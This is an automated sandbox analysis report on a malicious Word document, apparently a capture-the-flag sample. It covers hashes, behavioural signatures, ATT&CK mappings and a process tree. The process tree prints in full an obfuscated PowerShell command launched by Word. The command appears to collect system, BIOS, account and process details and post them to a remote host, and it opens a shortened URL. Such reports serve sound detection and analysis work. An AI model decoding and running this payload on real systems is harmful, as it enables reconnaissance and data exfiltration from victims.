f3ed5aa73ee8261ed9c1231f53c84fc75128c536c1387f704ecf701e02e05912

Resubmissions

02-04-2023 21:00

230402-ztkmssaf63 10

02-04-2023 21:00

230402-ztb1naaf59 8

02-04-2023 19:34

230402-x95lssbe3y 10

Analysis

max time kernel
540s
max time network
586s
platform
windows10-2004_x64
resource
win10v2004-20230220-en
resource tags

arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
submitted
02-04-2023 21:00

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

f3ed5aa73ee8261ed9c1231f53c84fc75128c536c1387f704ecf701e02e05912.doc
Size

699KB
MD5

e2b75e2ccc3d5309653dabe4de2cc9a6
SHA1

c265fc8f620dd242c71bb4644725097e5b27fff6
SHA256

f3ed5aa73ee8261ed9c1231f53c84fc75128c536c1387f704ecf701e02e05912
SHA512

378595f0908d462dbfc842468485c5734371da685117bdb8f3d6ec0c80ff19f51ba9b9d1be03f683889caf9570be8b4bd42b3097c20fb7df5552d37a711d747a
SSDEEP

12288:ieBDrBqfxtgV2rL1OlSogN/wLoRexQY0V5sEGI6D2YSrjWY6MkfnrueA4:fDSeV2rL1FoA/w0Y0V5/6D2dvWYIPruB

Score

10^/10

Malware Config

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

powershell.exe

description	pid	pid_target	process	target process
Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process	2968	3312	powershell.exe	WINWORD.EXE

Drops file in Program Files directory 2 IoCs

Processes:

setup.exe

description	ioc	process
File created	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\3afb80a0-c6ea-4078-9da5-63ae25aa404f.tmp	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20230402230153.pma	setup.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXEmsedge.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies registry class 1 IoCs

Processes:

msedge.exe

description ioc process

Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ msedge.exe
Suspicious behavior: AddClipboardFormatListener 2 IoCs

Processes:

WINWORD.EXE

pid process

3312 WINWORD.EXE
3312 WINWORD.EXE

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	msedge.exe

pid	process
3312	WINWORD.EXE
3312	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 13 IoCs

Processes:

powershell.exemsedge.exemsedge.exeidentity_helper.exemsedge.exe

pid	process
2968	powershell.exe
2968	powershell.exe
2968	powershell.exe
4424	msedge.exe
4424	msedge.exe
2688	msedge.exe
2688	msedge.exe
5192	identity_helper.exe
5192	identity_helper.exe
1668	msedge.exe
1668	msedge.exe
1668	msedge.exe
1668	msedge.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs

Processes:

msedge.exe

pid process

2688 msedge.exe
2688 msedge.exe
2688 msedge.exe
2688 msedge.exe
2688 msedge.exe
2688 msedge.exe
2688 msedge.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exesvchost.exe

description pid process

Token: SeDebugPrivilege 2968 powershell.exe
Token: SeManageVolumePrivilege 776 svchost.exe
Suspicious use of FindShellTrayWindow 3 IoCs

Processes:

msedge.exe

pid process

2688 msedge.exe
2688 msedge.exe
2688 msedge.exe
Suspicious use of SetWindowsHookEx 7 IoCs

Processes:

WINWORD.EXE

pid process

3312 WINWORD.EXE
3312 WINWORD.EXE
3312 WINWORD.EXE
3312 WINWORD.EXE
3312 WINWORD.EXE
3312 WINWORD.EXE
3312 WINWORD.EXE

pid	process
2688	msedge.exe
2688	msedge.exe
2688	msedge.exe
2688	msedge.exe
2688	msedge.exe
2688	msedge.exe
2688	msedge.exe

description	pid	process
Token: SeDebugPrivilege	2968	powershell.exe
Token: SeManageVolumePrivilege	776	svchost.exe

pid	process
2688	msedge.exe
2688	msedge.exe
2688	msedge.exe

pid	process
3312	WINWORD.EXE
3312	WINWORD.EXE
3312	WINWORD.EXE
3312	WINWORD.EXE
3312	WINWORD.EXE
3312	WINWORD.EXE
3312	WINWORD.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

WINWORD.EXEpowershell.exemsedge.exe

description	pid	process	target process
PID 3312 wrote to memory of 2968	3312	WINWORD.EXE	powershell.exe
PID 3312 wrote to memory of 2968	3312	WINWORD.EXE	powershell.exe
PID 2968 wrote to memory of 2688	2968	powershell.exe	msedge.exe
PID 2968 wrote to memory of 2688	2968	powershell.exe	msedge.exe
PID 2688 wrote to memory of 4240	2688	msedge.exe	msedge.exe
PID 2688 wrote to memory of 4240	2688	msedge.exe	msedge.exe
PID 2688 wrote to memory of 424	2688	msedge.exe	msedge.exe
PID 2688 wrote to memory of 424	2688	msedge.exe	msedge.exe
PID 2688 wrote to memory of 424	2688	msedge.exe	msedge.exe
PID 2688 wrote to memory of 424	2688	msedge.exe	msedge.exe
PID 2688 wrote to memory of 424	2688	msedge.exe	msedge.exe
PID 2688 wrote to memory of 424	2688	msedge.exe	msedge.exe
PID 2688 wrote to memory of 424	2688	msedge.exe	msedge.exe
PID 2688 wrote to memory of 424	2688	msedge.exe	msedge.exe
PID 2688 wrote to memory of 424	2688	msedge.exe	msedge.exe
PID 2688 wrote to memory of 424	2688	msedge.exe	msedge.exe
PID 2688 wrote to memory of 424	2688	msedge.exe	msedge.exe
PID 2688 wrote to memory of 424	2688	msedge.exe	msedge.exe
PID 2688 wrote to memory of 424	2688	msedge.exe	msedge.exe
PID 2688 wrote to memory of 424	2688	msedge.exe	msedge.exe
PID 2688 wrote to memory of 424	2688	msedge.exe	msedge.exe
PID 2688 wrote to memory of 424	2688	msedge.exe	msedge.exe
PID 2688 wrote to memory of 424	2688	msedge.exe	msedge.exe
PID 2688 wrote to memory of 424	2688	msedge.exe	msedge.exe
PID 2688 wrote to memory of 424	2688	msedge.exe	msedge.exe
PID 2688 wrote to memory of 424	2688	msedge.exe	msedge.exe
PID 2688 wrote to memory of 424	2688	msedge.exe	msedge.exe
PID 2688 wrote to memory of 424	2688	msedge.exe	msedge.exe
PID 2688 wrote to memory of 424	2688	msedge.exe	msedge.exe
PID 2688 wrote to memory of 424	2688	msedge.exe	msedge.exe
PID 2688 wrote to memory of 424	2688	msedge.exe	msedge.exe
PID 2688 wrote to memory of 424	2688	msedge.exe	msedge.exe
PID 2688 wrote to memory of 424	2688	msedge.exe	msedge.exe
PID 2688 wrote to memory of 424	2688	msedge.exe	msedge.exe
PID 2688 wrote to memory of 424	2688	msedge.exe	msedge.exe
PID 2688 wrote to memory of 424	2688	msedge.exe	msedge.exe
PID 2688 wrote to memory of 424	2688	msedge.exe	msedge.exe
PID 2688 wrote to memory of 424	2688	msedge.exe	msedge.exe
PID 2688 wrote to memory of 424	2688	msedge.exe	msedge.exe
PID 2688 wrote to memory of 424	2688	msedge.exe	msedge.exe
PID 2688 wrote to memory of 424	2688	msedge.exe	msedge.exe
PID 2688 wrote to memory of 424	2688	msedge.exe	msedge.exe
PID 2688 wrote to memory of 424	2688	msedge.exe	msedge.exe
PID 2688 wrote to memory of 424	2688	msedge.exe	msedge.exe
PID 2688 wrote to memory of 424	2688	msedge.exe	msedge.exe
PID 2688 wrote to memory of 424	2688	msedge.exe	msedge.exe
PID 2688 wrote to memory of 4424	2688	msedge.exe	msedge.exe
PID 2688 wrote to memory of 4424	2688	msedge.exe	msedge.exe
PID 2688 wrote to memory of 4824	2688	msedge.exe	msedge.exe
PID 2688 wrote to memory of 4824	2688	msedge.exe	msedge.exe
PID 2688 wrote to memory of 4824	2688	msedge.exe	msedge.exe
PID 2688 wrote to memory of 4824	2688	msedge.exe	msedge.exe
PID 2688 wrote to memory of 4824	2688	msedge.exe	msedge.exe
PID 2688 wrote to memory of 4824	2688	msedge.exe	msedge.exe
PID 2688 wrote to memory of 4824	2688	msedge.exe	msedge.exe
PID 2688 wrote to memory of 4824	2688	msedge.exe	msedge.exe
PID 2688 wrote to memory of 4824	2688	msedge.exe	msedge.exe
PID 2688 wrote to memory of 4824	2688	msedge.exe	msedge.exe
PID 2688 wrote to memory of 4824	2688	msedge.exe	msedge.exe
PID 2688 wrote to memory of 4824	2688	msedge.exe	msedge.exe
PID 2688 wrote to memory of 4824	2688	msedge.exe	msedge.exe
PID 2688 wrote to memory of 4824	2688	msedge.exe	msedge.exe
PID 2688 wrote to memory of 4824	2688	msedge.exe	msedge.exe
PID 2688 wrote to memory of 4824	2688	msedge.exe	msedge.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\f3ed5aa73ee8261ed9c1231f53c84fc75128c536c1387f704ecf701e02e05912.doc" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3312

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden ('68r111:32y123c36A123N65N125:32I61l32N46r40-39N71A39-43:39:101y116A45-82:39:43r39y97-110w39-43-39A100y111A109A39y41-32A45w77N105A110y105A109A117:109l32:48A32:45r77I97w120y105l109N117w109y32N57I57w57r57A57r57-125y32A85c110c116w105A108A40r33I40A46r40c39c84w101c115N39l43r39w116r39N43w39l45:80I39y43-39w97:116c104N39l41c32A34A36A40:36c101I110:118A58y76c79A67w65N76I65A80I80A68c65r84y65A41w92:84:101l109I112A92-36y40A36I97A41r46-116y120r116l34-41N41w59-32l13l10-13w10A36N123y98c125I32N61A32N34-36l40w36y101r110l118N58w76r79-67A65-76y65w80A80c68y65N84:65-41y92y84w101N109c112I92l34:32-43y32N36:123:65c125c32-43y32:40c34:123l48w125N123-49-125A34l45y102-39w46-39-44N39l116y120r116c39I41A59-13c10w36N123r67:125r32I61c32w46r40:39r71I101:39w43r39-116l45w87I109y105w79I98I106c39r43y39c101:99y39N43w39w116-39N41c32l45r81I117-101N114A121r32w40A34I123l49y51N125l123:49y52N125c123:53N125l123A51I125c123N49A125-123-49y49w125A123N50:125y123y54l125-123l52w125l123-49I50A125I123A49w48l125-123:55r125l123l57N125A123c56c125-123:48l125l34I45A102c39N117w116A101y114N83:121-115-116N101I109l39-44-39:101-44-32I68r111c109A97r39I44A39I32N39N44N39-101A44l32l78:97c109A39c44l39N97l110r117:102c97:99N39:44c39-108A101y99-116w32N85A115r101y114-78I97l109y39c44N39N77N39A44r39A84l121r112w101-32c102w114y111A39r44w39r109l112:39y44c39r109c32-87w105I110c51c50w95y67:111I39c44:39r101c114r44N32-77N111N100y101-108w44I32l83l121y115A116A101-109I39r44r39N105c110I44l39:44l39r116-117I114c39r44r39I83w39N44A39c101-39N41y59:13I10A36r123y68N125:32I61A32c38r40l39:71-39y43:39A101w116r45y87:109:105-39l43:39y79y39y43-39y98-106r101c39I43-39l99-116I39c41w32y45l81l117c101-114:121y32w40A34-123c53y125w123y52y125l123-56w125I123A54-125l123l57-125r123A48N125I123-50-125r123r51l125r123I55y125-123r49A125I34w32-45:102w39r101w114c32:39l44:39y51r50r95c66:73-79w83:39l44-39y102w39N44c39-114N111l109:39y44A39w32:83I101l114-39w44I39:83N101w108w101I99c116A39I44N39w97:108y78l117y39y44r39r32-87:105-110A39-44r39y105N39I44A39r109l98c39N41r59A13N10r36:123:101c125r32l61y32c46A40N39:71w39c43y39c101r116A39-43:39A45w87-109c105I79I98w39w43-39y106l101c39l43c39r99c116:39y41N32l45:81y117A101c114r121A32A40N34:123w54r125:123l56l125I123y48w125w123c57c125N123l55r125l123A51A125y123I50l125N123l49:48w125I123N53r125-123:52:125-123r49N125l34-45w102I32r39w116c32c67A97A112N116A105I111r39c44:39A115c116A101y109r39y44l39A87y105A110-51I50c95c79-112I101r114A97:39c44c39w32N39r44I39r103c83r121w39I44c39I105-110A39N44:39N83-39I44:39r109w39r44I39-101:108y101w99A39w44r39r110A32-102:114N111l39I44w39I116c39I41c59w13A10-36l123-70A125:32A61y32A46l40-39w71y101:116y39r43c39:45y39A43c39I87c109c105N79I39c43I39:98I106y101I39l43c39N99N116N39I41I32w45c81I117c101-114l121I32w40-34:123y53N125I123I49A51N125N123y48I125y123w49c52I125r123-50c125y123w49l53-125r123I52N125-123y51c125I123c49I50N125:123:57c125N123I49w55:125c123y49:54c125A123r56c125:123A49y48l125:123I49-125A123A54l125r123c49A49w125w123N55-125I34I32A45A102N39N109-39:44N39A84c39r44w39c32N102:114l111y109l32w87I105I110l39l44:39r85w115N101y114I39I44w39c95:39-44w39w83I101I108N101c99w116:32I39N44N39l114w39y44-39c101r39l44w39y99-97I108r65l99I99c111I117c39:44I39w99N99r111c117I39-44A39y110c116y32A61c32r39-44c39I117-39l44y39A65-39r44w39l78y97c39I44y39w101l39w44c39-51r50:39:44l39w32y87A104l101w114-101c32c76r111r39I44N39:110A116y39N41A59w13w10N36c123w103c125l32I61c32I46A40I39N71r39w43y39r101y116-45I87c39I43c39r109l105I79I98c106:39l43l39:101y39w43l39w99w116r39:41-32y45N81c117l101l114w121r32:40w34c123r53-125y123c49A49-125w123A56I125:123w51c125:123w54I125l123w50r125r123w49y48r125-123-57y125c123y49l125A123r48y125A123N55w125I123r52c125c34y45-102l39c32c87y39w44N39I111N109r39:44-39c109N101r44r32A80c114-111I99r101:115-39w44A39c32:78c39r44A39I115w115A39N44l39r83N101l108I39r44l39r97I39-44N39w105c110y51I50N95A80A114y111A99N101w39w44I39N99y116:39-44A39c32N102w114I39:44A39A115r73I68A39A44I39c101y39c41r59w13I10I13:10r46l40I39I110A105y39r41-32-45w80w97w116:104w32A36l123y66I125N32y45l70I111:114l99-101r32l124I32y38w40w39c79l39w43-39w117I116l45c78l117r108w108I39r41A59c13l10A13N10r36w123l99y125:46l34-117N115:96I69y96w82l110y97:77r101A34w32:62l62N32c36-123A66-125-59I13I10w36A123:67c125I46:34c110N96r65c109-101w34r32I62I62I32l36I123l98:125A59l13w10N36-123-67y125-46r34c68r111y96y77w65I105I78A34A32r62w62I32l36c123-98r125A59A13:10l34-36-40w36A99c46y77r97A110I117-102:97N99-116N117c114l101N114l41c32I36I40l36:99w46w77l111N100c101l108N41N32w34w32r62r62I32:36w123A66l125w59N13A10N36l123-100A125I46-34-115r101:96w82N73A96-65-76l78:85I77:96:66l69y114y34-32r62w62:32N36-123y66r125A59N13N10-34:36:40N36c101-46r67I97w112y116A105r111r110r41I32w36c40y36c99w46:83r121l115I116y101N109w84y121N112:101-41:32w34r32I62:62:32A36-123w66y125I59y13w10-34l34I32N62-62-32r36A123r66I125c59c13I10w70A111:114-69y97-99c104y40-36y123l78:125:32I105r110I32w36-123c70N125N41l123N36N123c110:125y46w34y110-96r65r77N69c34:32N62r62c32:36:123-66y125l125w59N13c10-34A34c32w62N62:32c36c123:66r125y59c13I10l70c111r114N69r97:99r104-40-36:123N112y125-32y105y110w32-36A123:103:125I41w123l34:36r40l36l112N46I80-114r111I99y101:115l115l73N68N41l32w36I40:36l112I46-78A97w109-101N41N32-34N32:62-62-32I36c123y66l125:125y59w13N10y13:10-116y114:121A32r123w36-123r82A125N32I61-32-46l40I39w103l99:39A41-32w36l123I98r125I32:45A82-101A97N100y67A111y117N110l116w32y48l32I124:32N38-40:39l105w39-43A39c119-114y39y41w32-40-34y123-53c125A123A50r125r123N52r125N123I49N125:123I48l125I123r51I125-123N54r125I34N45-102w39r74r51I99w39y44w39I55A51r39y44-39l56:47N51c106c39r44r39I55l51N39N44:39:51-67w39y44-39I49A48-46:49N46w54A46I39l44r39A74N51w67y55-39A41N32y45y77I101:116r104r111N100l32-40A34l123w48r125I123y49c125l34I45:102w32:39N80r79c39N44N39N83y84:39w41N32N45w67:111c110I116I101w110-116A84r121-112:101I32y40A34-123N50:125l123r49-125c123w48-125w34w45l102l39y116A47-112y108I97N105c110N39I44l39I101r120:39w44N39N116r39N41w125-32-99:97c116I99-104w32A123l36N123w82w125N32A61A32-36y123N95r125y46r34w69I88A96A99:69A80A84A96N73A79I78I34:125y59y13N10N13r10c38c40c39c115I39N43:39w116:97:114l116:39w41:32N40r34c123l54r125A123y49-125c123I51l125c123I53N125:123c48r125c123I50N125w123y52l125A123y55y125A34y45:102y32I39l114I108-39c44r39r112I115A58:47y39y44N39A46:97N116:47N97I99N109I39c44I39N47l115A39r44y39A83:39:44w39A104c111N114c116I117w39y44y39A104N116y116c39r44l39y54A39:41N13c10c13r10c46l40y39w114A105:39y41r32y36r123:66w125A13c10A35y102I108A97A103y123I97N53r99-49c49A95l102-114I51I51c95:52:55r95c108N52:53A55l125'.spLiT(':Nr-wIlycA') | %{( [CHar][INt] $_) }) -jOIN '' |.( $SHeLLID[1]+$sHELLid[13]+'x')
2⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2968

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://shorturl.at/acmS6
3⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2688

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffd951646f8,0x7ffd95164708,0x7ffd95164718
4⤵
PID:4240

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2108,15720445490048210547,2992226254720978486,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2152 /prefetch:2
4⤵
PID:424

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2108,15720445490048210547,2992226254720978486,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 /prefetch:3
4⤵
- Suspicious behavior: EnumeratesProcesses
PID:4424

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2108,15720445490048210547,2992226254720978486,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2720 /prefetch:8
4⤵
PID:4824

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,15720445490048210547,2992226254720978486,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3628 /prefetch:1
4⤵
PID:4920

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,15720445490048210547,2992226254720978486,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3644 /prefetch:1
4⤵
PID:2588

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,15720445490048210547,2992226254720978486,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5124 /prefetch:1
4⤵
PID:2648

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,15720445490048210547,2992226254720978486,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3816 /prefetch:1
4⤵
PID:4672

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,15720445490048210547,2992226254720978486,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3840 /prefetch:1
4⤵
PID:4304

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2108,15720445490048210547,2992226254720978486,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5336 /prefetch:8
4⤵
PID:1464

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
4⤵
- Drops file in Program Files directory
PID:1436

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7ff6de1d5460,0x7ff6de1d5470,0x7ff6de1d5480
5⤵
PID:2648

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2108,15720445490048210547,2992226254720978486,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5336 /prefetch:8
4⤵
- Suspicious behavior: EnumeratesProcesses
PID:5192

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,15720445490048210547,2992226254720978486,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5812 /prefetch:1
4⤵
PID:5320

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,15720445490048210547,2992226254720978486,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5108 /prefetch:1
4⤵
PID:5312

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2108,15720445490048210547,2992226254720978486,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3164 /prefetch:2
4⤵
- Suspicious behavior: EnumeratesProcesses
PID:1668

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2884

C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.VCLibs.140.00_8wekyb3d8bbwe
1⤵
PID:4472

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k UnistackSvcGroup
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:776

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\80237EE4964FC9C409AAF55BF996A292_C5130A0BDC8C859A2757D77746C10868
Filesize
471B

MD5
6d4008ef73ec2bc5b5bf06b10c78dd55

SHA1
c8783bcdf921bec73ff2a74bda30617769315b5f

SHA256
76e76043524d2d3f8e4bc41ab7cce99c3e837352acf7a813e61b20b695369569

SHA512
f47ec107debc21e249b5bc60dfab88724a4a2169502cc6aa22ef3c9e9aaf137ec105814d78eda56a3877f56318443c36488050bda59d9ad2f0d9a1238f7465d6

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\80237EE4964FC9C409AAF55BF996A292_C5130A0BDC8C859A2757D77746C10868
Filesize
442B

MD5
fdc2f737fac1067c31577872b7b1772a

SHA1
83d41f9f4fcaf519e48b04da401146e15590fd29

SHA256
44d6c02f15517c50d7275735c01ed7e1ff3b144dbfb5f99253502e00146a120b

SHA512
ce694e42746e58a128c4b135a475f6259318d9fb87a00637b05935ca8a193ad50ca0a0cce433811f08ac132a9833d15a2e61494c0f24f9d0a60e680ef8c10f71

Download Submit
C:\Users\Admin\AppData\Local\Comms\UnistoreDB\store.jfm
Filesize
16KB

MD5
